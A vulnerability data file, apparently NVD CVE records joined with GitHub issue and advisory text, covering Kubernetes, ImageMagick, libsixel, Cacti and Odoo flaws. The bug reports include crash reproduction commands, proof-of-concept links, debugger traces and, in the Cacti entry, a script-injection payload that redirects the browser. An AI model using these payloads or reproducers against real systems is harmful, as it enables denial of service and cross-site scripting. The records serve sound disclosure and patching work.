"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*",
"matchCriteriaId": "4DBCD38F-BBE8-488C-A8C3-5782F191D915",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/kubernetes/kubernetes/issues/74534 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) (6.5, medium)
Users that are authorized to make patch requests to the Kubernetes API Server can send a specially crafted patch of type “json-patch” (e.g. `kubectl patch --type json` or `"Content-Type: application/json-patch+json"`) that consumes excessive resources while processing, causing a Denial of Service on the API Server.
Thanks to Carl Henrik Lunde for reporting this problem.
CVE-2019-1002100 is **fixed** in the following Kubernetes releases:
* [v1.11.8](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.11.md/#v1118)
* [v1.12.6](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.12.md/#v1126)
* [v1.13.4](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md/#v1134)
### Affected components:
* Kubernetes API server
### Affected versions:
* Kubernetes v1.0.x-1.10.x
* Kubernetes v1.11.0-1.11.7 (fixed in [v1.11.8](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.11.md/#v1118))
* Kubernetes v1.12.0-1.12.5 (fixed in [v1.12.6](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.12.md/#v1126))
* Kubernetes v1.13.0-1.13.3 (fixed in [v1.13.4](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md/#v1134))
### Mitigations:
* Remove ‘patch’ permissions from untrusted users.
Note: If you are using binaries or packages provided by a distributor (not the ones provided in the open source release artifacts), you should contact them to determine what versions resolve this CVE. Distributors may choose to provide support for older releases beyond the ones maintained by the open source project.
### Post-mortem:
* [Document](https://github.com/kubernetes/kubernetes/files/3005552/PM-CVE-2019-1002100.pdf)
| CVE-2019-1002100: json-patch requests can exhaust apiserver resources | https://api.github.com/repos/kubernetes/kubernetes/issues/74534/comments | 4 | 2019-02-25T19:39:09Z | 2022-05-16T21:57:19Z | https://github.com/kubernetes/kubernetes/issues/74534 | 414,272,146 | 74,534 |
CVE-2019-10714 | 2019-04-02T21:29:00.250 | LocaleLowercase in MagickCore/locale.c in ImageMagick before 7.0.8-32 allows out-of-bounds access, leading to a SIGSEGV. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/07eebcd72f45c8fd7563d3f9ec5d2bed48f65f36"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/58d9c46929ca0828edde34d263700c3a5fe8dc3c"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/edc7d3035883ddca8413e4fe7689aa2e579ef04a"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1495"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "78CC3088-3ED5-4CED-B051-2A3B58EDA881",
"versionEndExcluding": "6.9.10-32",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44A0DE96-7F73-47AE-852D-3EC40C3A3D18",
"versionEndExcluding": "7.0.8-32",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0-0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1495 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
```C
1522 MagickExport int LocaleLowercase(const int c)
1523 {
1524 #if defined(MAGICKCORE_LOCALE_SUPPORT)
1525 if (c_locale != (locale_t) NULL)
1526 return(tolower_l(c,c_locale));
1527 #endif
1528 return(tolower(c));
1529 }
```
The parameter `c` missing check in function LocaleLowercase, which may lead to out-of-boundary vulnerability.
### Steps to Reproduce
https://github.com/Dk0n9/MyFuzzy/blob/master/oob_LocaleLowercase_crash
`magick convert oob_LocaleLowercase_crash /dev/null`
In the gdb:
```
Stopped reason: SIGSEGV
0x00007ffff6ddd857 in __tolower_l (c=0x14f3cf, l=0x7ffff7197960 <_nl_C_locobj>)
at ctype_l.c:42
42 in ctype_l.c
2: c_locale = (volatile locale_t) 0x7ffff7197960 <_nl_C_locobj>
gdb-peda$ bt
#0 0x00007ffff6ddd857 in __tolower_l (c=0x14f3cf, l=0x7ffff7197960 <_nl_C_locobj>)
at ctype_l.c:42
#1 0x00007ffff777f8ac in LocaleLowercase (c=0x14f3cf) at MagickCore/locale.c:1526
#2 0x00007ffff782a575 in GlobExpression (
expression=0x7ffffffedf82 "\365\217\217\217\217MMa\\-d-\n",
pattern=0x7ffff7a8bb98 "EPSF-*", case_insensitive=MagickTrue)
at MagickCore/token.c:544
#3 0x00007ffff782a0af in GlobExpression (
expression=0x7ffffffedf82 "\365\217\217\217\217MMa\\-d-\n",
pattern=0x7ffff7a8bb98 "EPSF-*", case_insensitive=MagickTrue)
at MagickCore/token.c:411
#4 0x00007ffff795385e in ReadPSImage (image_info=0x555555775d60,
exception=0x55555576ab10) at coders/ps.c:617
#5 0x00007ffff769f8fa in ReadImage (image_info=0x555555772a70,
exception=0x55555576ab10) at MagickCore/constitute.c:547
#6 0x00007ffff76a0fe3 in ReadImages (image_info=0x55555576f780,
filename=0x555555769bb0 "./crash", exception=0x55555576ab10)
at MagickCore/constitute.c:917
#7 0x00007ffff72163a1 in ConvertImageCommand (image_info=0x55555576f780, argc=0x3,
argv=0x55555576a190, metadata=0x7fffffffbc10, exception=0x55555576ab10)
at MagickWand/convert.c:644
#8 0x00007ffff72e9d0f in MagickCommandGenesis (image_info=0x55555576c490,
command=0x7ffff72150f2 <ConvertImageCommand>, argc=0x3, argv=0x7fffffffdf90,
metadata=0x0, exception=0x55555576ab10) at MagickWand/mogrify.c:184
#9 0x0000555555555347 in MagickMain (argc=0x3, argv=0x7fffffffdf90)
at utilities/magick.c:149
#10 0x0000555555555484 in main (argc=0x4, argv=0x7fffffffdf88)
at utilities/magick.c:180
#11 0x00007ffff6dceb97 in __libc_start_main (main=0x555555555464 <main>, argc=0x4,
argv=0x7fffffffdf88, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffdf78) at ../csu/libc-start.c:310
#12 0x000055555555504a in _start ()
```
### System Configuration
- ImageMagick version: ImageMagick 7.0.8-30 Q16 x86_64
- Environment (Operating system, version and so on): Ubuntu 18.04
- Additional information:
Credit: dk from Chaitin Tech
| Out-of-boundary in function LocaleLowercase of MagickCore/locale.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1495/comments | 2 | 2019-03-04T14:35:44Z | 2019-04-03T01:40:39Z | https://github.com/ImageMagick/ImageMagick/issues/1495 | 416,830,460 | 1,495 |
CVE-2019-11024 | 2019-04-08T23:29:00.790 | The load_pnm function in frompnm.c in libsixel.a in libsixel 1.8.2 has infinite recursion. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/saitoha/libsixel/issues/85"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://research.loginsoft.com/bugs/1501/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/saitoha/libsixel/issues/85 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"saitoha",
"libsixel"
] | **Description** : we Observerd an infinite recursive loop at function load_pnm( ) at file frompnm.c which can lead to a denial of service attack.
**Command** : ./img2sixel -78eIkiugv -w 4 -h 8 -q auto -l force -o out $POC
**POC** : [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/libsexel/POC_l1?raw=true)
**DEBUG** :
~~~
Gdb: [ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x00007fffffffd160 → 0x43434380f0314300
$rbx : 0x00007fffffffd2a0 → 0x00007fffffffd660 → 0x0000000000000000
$rcx : 0x00007fffffffd100 → 0x0000000000000000
$rdx : 0x0
$rsp : 0x00007fffffffcf50 → 0x000060400000dfd0 → 0xbebebebe00000003
$rbp : 0x00007fffffffd2c0 → 0x00007fffffffd690 → 0x00007fffffffd780 → 0x00007fffffffd7f0 → 0x00007fffffffddb0 → 0x0000000000401c00 → <__libc_csu_init+0> push r15
$rsi : 0x0
$rdi : 0x0
$rip : 0x00007ffff6c08ec1 → <load_pnm+2222> mov rax, QWORD PTR [rbp-0x2f0]
$r8 : 0x3
$r9 : 0x184d0
$r10 : 0x2b1
$r11 : 0x00007ffff6ef6ab0 → <__asan_memset+0> push rbp
$r12 : 0x00000ffffffff9fc → 0x0000000000000000
$r13 : 0x00007fffffffcfe0 → 0x0000000041b58ab3
$r14 : 0x00007fffffffcfe0 → 0x0000000041b58ab3
$r15 : 0x0
$eflags: [CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcf50│+0x0000: 0x000060400000dfd0 → 0xbebebebe00000003 ← $rsp
0x00007fffffffcf58│+0x0008: 0x000060700000dfd4 → 0x0000000000000003
0x00007fffffffcf60│+0x0010: 0x000060700000dfd0 → 0x00000003ffffffff → 0x0000000000000000
0x00007fffffffcf68│+0x0018: 0x0000000000000000
0x00007fffffffcf70│+0x0020: 0x000060700000dfcc → 0xffffffff00000000
0x00007fffffffcf78│+0x0028: 0x000060700000dfc8 → 0x0000000000000000
0x00007fffffffcf80│+0x0030: 0x000060700000dfb8 → 0x000060300000efb0 → 0xffff000000000000
0x00007fffffffcf88│+0x0038: 0x000060400000dfd0 → 0xbebebebe00000003
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff6c08eac <load_pnm+2201> mov QWORD PTR [rbp-0x328], rax
0x7ffff6c08eb3 <load_pnm+2208> lea rax, [rbx-0x140]
0x7ffff6c08eba <load_pnm+2215> mov QWORD PTR [rbp-0x2f0], rax
→ 0x7ffff6c08ec1 <load_pnm+2222> mov rax, QWORD PTR [rbp-0x2f0]
0x7ffff6c08ec8 <load_pnm+2229> mov rdx, rax
0x7ffff6c08ecb <load_pnm+2232> shr rdx, 0x3
0x7ffff6c08ecf <load_pnm+2236> add rdx, 0x7fff8000
0x7ffff6c08ed6 <load_pnm+2243> movzx edx, BYTE PTR [rdx]
0x7ffff6c08ed9 <load_pnm+2246> test dl, dl
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:frompnm.c+229 ────
224 for (y = 0 ; y < height ; y++) {
225 for (x = 0 ; x < width ; x++) {
226 b = (maps == 2 ? 3 : 1);
227 for (i = 0 ; i < b ; i++) {
228 if (ascii) {
// s=0x00007fffffffcfd0 → [...] → 0x43434380f0314300
→ 229 while (*s == '\0') {
230 if (p >= end) {
231 break;
232 }
233 p = pnm_get_line(p, end, tmp);
234 s = tmp;
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "img2sixel", stopped, reason: SIGINT
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff6c08ec1 → load_pnm(p=0x62d00000a427 "\027", '\276' <repeats 4056 times>, length=0x28, allocator=0x60400000dfd0, result=0x60700000dfb8, psx=0x60700000dfc8, psy=0x60700000dfcc, ppalette=0x0, pncolors=0x60700000dfd0, ppixelformat=0x60700000dfd4)
[#1] 0x7ffff6c077b3 → load_with_builtin(pchunk=0x60300000efe0, fstatic=0x0, fuse_palette=0x0, reqcolors=0x100, bgcolor=0x0, loop_control=0x1, fn_load=0x7ffff6c16ad6 <load_image_callback>, context=0x610000007f40)
[#2] 0x7ffff6c0836f → sixel_helper_load_image_file(filename=0x7fffffffe2b1 "hang10", fstatic=0x0, fuse_palette=0x0, reqcolors=0x100, bgcolor=0x0, loop_control=0x1, fn_load=0x7ffff6c16ad6 <load_image_callback>, finsecure=0x1, cancel_flag=0x606ac0 <signaled>, context=0x610000007f40, allocator=0x60400000dfd0)
[#3] 0x7ffff6c16f5b → sixel_encoder_encode(encoder=0x610000007f40, filename=0x7fffffffe2b1 "hang10")
[#4] 0x4019ce → main(argc=0xd, argv=0x7fffffffde98)
~~~ | infinite recursive loop in load_pnm( ) | https://api.github.com/repos/saitoha/libsixel/issues/85/comments | 2 | 2019-03-29T05:47:49Z | 2019-12-18T20:34:07Z | https://github.com/saitoha/libsixel/issues/85 | 426,827,367 | 85 |
CVE-2019-11025 | 2019-04-08T23:29:00.853 | In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/compare/6ea486a...99995bb"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cacti/cacti/issues/2581"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00017.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00038.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5C1989C8-DBC3-4926-8AA3-245A0E8FE2DC",
"versionEndExcluding": "1.2.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Cacti/cacti/issues/2581 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cacti",
"cacti"
] | **Describe the bug**
There's no escape being done before printing out the value of `SNMP community string` (SNMP Options) in the `View poller cache`.
**To Reproduce**
Steps to reproduce the behavior:
1. Login as normal user ( should have device creation explicitly enabled ).
2. Select create a new device from the console menu.
3. Enter the below shared payload into the "`SNMP community string" field & save the device.
Payload - `<script> alert('XSS'); document.location.replace('//google.com');</script>`
4. Now login as an `Admin` user & go to Utilities > System utils > View poller cache, XSS would be trigerred & redirected to google.com as specified in the payload. .
**Expected behavior**
Proper filtration & escaping needs to be done, before taking in the data from the user.
**Screenshots**
<img width="515" alt="Screenshot_6" src="https://user-images.githubusercontent.com/42465102/55149049-71901b00-516f-11e9-8332-e0af9200f2d5.png">
**Desktop (please complete the following information):**
- OS: Ubuntu 16.04
- Browser: Firefox
**Smartphone (please complete the following information):**
**Additional context**
Vulnerable snippet:
[Line 1849](https://github.com/Cacti/cacti/blob/develop/utilities.php#L1849) in utilities.php
` __('Community:') . ' ' . $item['snmp_community'] `
| When viewing poller cache, Device SNMP community is not properly escaped | https://api.github.com/repos/Cacti/cacti/issues/2581/comments | 2 | 2019-03-28T10:14:04Z | 2020-06-30T03:46:01Z | https://github.com/Cacti/cacti/issues/2581 | 426,407,384 | 2,581 |
CVE-2018-15631 | 2019-04-09T16:29:01.087 | Improper access control in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote authenticated attackers to e-mail themselves arbitrary files from the database, via a crafted RPC request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32516"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.excellium-services.com/cert-xlm-advisory/cve-2018-15631/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "A958BCBB-C656-44A5-A9A9-66A66AEA67A0",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "059733D6-977F-4731-BA24-36F6F50F76AB",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32516 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-11-28-3
Improper access control in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote authenticated attackers to e-mail themselves arbitrary files from the database, via a crafted RPC request.
**Affects**: Odoo Community 12.0 and earlier and Odoo Enterprise 12.0 and earlier
**Component**: Discuss
**Credits**: Benoît Chenal (Excellium-services – Application Security)
**CVE ID**: [CVE-2018-15631](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15631)
## I. Background
Odoo includes an integrating messaging system that allows users to post notes
and messages on business documents, automatically track email replies, records
lifecycle events for documents, and provides a real-time chat.
## II. Problem Description
The messaging system did not properly restrict access to private files stored in
the database.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: User account required
**CVSS3 Score**: Medium :: 6.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Malicious users with a valid account (internal or external/portal) may obtain
a copy of arbitrary files stored in the database, even on documents that they
cannot access, by crafting special RPC packets.
This may allow them to access sensitive data, including invoice PDFs or
any confidential data that may be attached to business documents in the
target database.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
This vulnerability can only be exploited by users who are allowed to create
records for the "mail.message" and "mail.mail" models. Restricting `create`
and `write` access to these models via ACLs is enough to prevent exploiting
this issue. However, such restrictions would be quite drastic, especially when
applied to internal users, and may prevent users to use most features of the
system.
It is strongly recommended to update your installation to the latest version
instead (or apply the patch) in order to fix the issue without impacting other
features.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation.
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/12.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to the latest source
code layout of the Odoo project on GitHub. If your installation differs, please
extract the various patch hunks from the files and apply them in the appropriate
locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 10.0: 9043305fa01fc21dc8a7dd996aa20765dbc7d93c
- 11.0: bb8df1b79a086f403bfe431a9d46586dc50274df
- 12.0: 863f3275d2ea7b726b3670ded4112664ccfdea6e
- 12.0-ent, 11.0-ent and 10.0-ent (Enterprise): see 12.0, 11.0 and 10.0.
| [SEC] ODOO-SA-2018-11-28-3 (CVE-2018-15631) - Improper access control in the... | https://api.github.com/repos/odoo/odoo/issues/32516/comments | 0 | 2019-04-08T13:40:55Z | 2019-04-08T13:40:57Z | https://github.com/odoo/odoo/issues/32516 | 430,458,377 | 32,516 |
CVE-2018-15635 | 2019-04-09T16:29:01.130 | Cross-site scripting vulnerability in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote attackers to inject arbitrary web script in the browser of an internal user of the system by tricking them into inviting a follower on a document with a crafted name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.6,
"impactScore": 4.2,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32515"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
